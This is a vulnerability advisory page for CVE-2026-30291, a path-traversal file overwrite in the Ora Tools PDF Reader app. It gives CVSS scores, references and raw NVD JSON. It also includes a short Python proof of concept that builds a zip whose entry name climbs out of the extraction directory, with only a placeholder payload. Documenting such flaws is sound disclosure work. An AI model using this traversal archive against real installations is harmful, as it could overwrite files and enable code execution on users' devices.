CVE-2026-30291

Description

An arbitrary file overwrite vulnerability in Ora Tools PDF Reader ' Reader & Editor APPv4.3.5 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ora Tools PDF Reader v4.3.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os
import zipfile

# Proof of Concept for CVE-2026-30291
# This script creates a malicious file attempting path traversal

def create_malicious_poc():
    # The malicious payload content
    payload_content = b"MALICIOUS_CODE_EXECUTION"
    
    # Path traversal filename to overwrite critical files
    # Note: Actual target path depends on the app's implementation
    malicious_filename = "../../../../../tmp/pwned.txt"
    
    # Create a zip file (if the app handles zips) or just the file
    # Assuming the app imports a specific format
    with zipfile.ZipFile('malicious_poc.zip', 'w') as zf:
        # Attempt to write outside the extraction directory
        zf.writestr(malicious_filename, payload_content)
    
    print(f"[+] Created malicious_poc.zip with file: {malicious_filename}")
    print("[+] Import this file into Ora Tools PDF Reader to trigger.")

if __name__ == "__main__":
    create_malicious_poc()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30291
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30291
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30291/
[4] VulDB https://vuldb.com/cve/CVE-2026-30291
[5] https://github.com/Secsys-FDU/AF_CVEs/issues/18
[6] https://oratools.github.io/
[7] https://play.google.com/store/apps/details?id=pdf.reader.editor.office.ora
[8] https://secsys.fudan.edu.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30291", "sourceIdentifier": "[email protected]", "published": "2026-04-01T15:22:58.943", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in Ora Tools PDF Reader ' Reader & Editor APPv4.3.5 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/18", "source": "[email protected]"}, {"url": "https://oratools.github.io/", "source": "[email protected]"}, {"url": "https://play.google.com/store/apps/details?id=pdf.reader.editor.office.ora", "source": "[email protected]"}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]"}]}}